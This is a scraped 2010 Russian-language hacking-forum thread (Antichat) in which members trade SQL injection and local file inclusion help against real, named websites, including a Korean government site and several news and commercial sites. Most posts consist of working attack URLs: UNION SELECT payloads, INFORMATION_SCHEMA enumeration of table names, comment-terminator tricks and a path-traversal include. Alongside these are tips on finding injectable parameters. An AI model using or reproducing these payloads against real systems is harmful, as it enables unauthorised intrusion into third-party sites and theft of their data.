Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.01.2010, 00:08
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1 ,1)=3,4,5 -false
как прокрутить скуль?
Последний раз редактировалось Micr0b; 11.01.2010 в 00:11..
|
|
|
11.01.2010, 00:51
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Micr0b
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+order+by+20 -true
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+1=1 -true
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+substring(@@version,1 ,1)=3,4,5 -false
как прокрутить скуль?
Может быть тут нужно условие?)
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@ve rsion,1%20,1%29=1,1,0%29
Не пробывал,но помоему оно необходимо 
|
|
|
|
11.01.2010, 01:38
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Сообщение от m0Hze
Может быть тут нужно условие?)
http://english.president.go.kr/pre_activity/photos/photos_view.php?uno=2438+and+if%28substring%28@@ve rsion,1%20,1%29=1,1,0%29
Не пробывал,но помоему оно необходимо
false(
|
|
|
|
11.01.2010, 03:01
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Причём тут http://www.korea.net/? Совсем другой сайт.
|
|
|
|
11.01.2010, 11:18
|
|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022
Репутация:
4
|
|
Сообщение от S00pY
туц
Код:
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*-+&sec=2
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано,
По моим последним наблюдениям до 80% веб ресурсов сети подвержены подобным атакам
как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Последний раз редактировалось Gidz; 11.01.2010 в 11:21..
|
|
|
|
11.01.2010, 14:27
|
|
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555
Репутация:
1
|
|
http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд
И еще как узнать название всех таблиц в sql 4.1.25
Последний раз редактировалось FaTRuS; 11.01.2010 в 14:35..
|
|
|
|
11.01.2010, 15:22
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от Gidz
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано, как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Помоему просто мусор. Можно так.
http://asiane wsnet.net/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24/*
На счёт второго вопроса, можно и с id=, и с int= и e=, это просто другие названия переменных и не более...Моё имхо, лучше для начала сделать простенький сайтец, php+mysql+ещё что-то), желательно с нуля, после чего тебе будет всё более понятней и интересней. Ествественно в ходе создания сайта, в теории ты выучишь хотя php и mysql.. Потому как сразу без какого-то рабочего опыта, будет сложновато.
Сообщение от FaTRuS
http://clean.kz/index.php?act=
Выдает ошибку Warning: main(/home/clean/data/public_html/modules/.php)
можно ли произвести локальный инклуд
И еще как узнать название всех таблиц в sql 4.1.25
Так как там magic_quotes_gpc=on, то нулем не заменишь, разве что через /////////[...].
Последний раз редактировалось v1d0qz; 11.01.2010 в 15:54..
|
|
|
|
12.01.2010, 02:24
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Торможу, не спал вторые сутки.Сильно не пинайте =)
Не могу обрезать запрос, как только не пробовал, добавляется ,3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*,3' at line 1
|
|
|
|
12.01.2010, 03:35
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
2FaTRuS
шото канешн инклюдится!
http://clean.kz/index.php?act=../index
но тама base_dir() (
|
|
|
|
12.01.2010, 03:36
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Imperou$
Торможу, не спал вторые сутки.Сильно не пинайте =)
Не могу обрезать запрос, как только не пробовал, добавляется ,3
Заюзай заместо /*, +--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
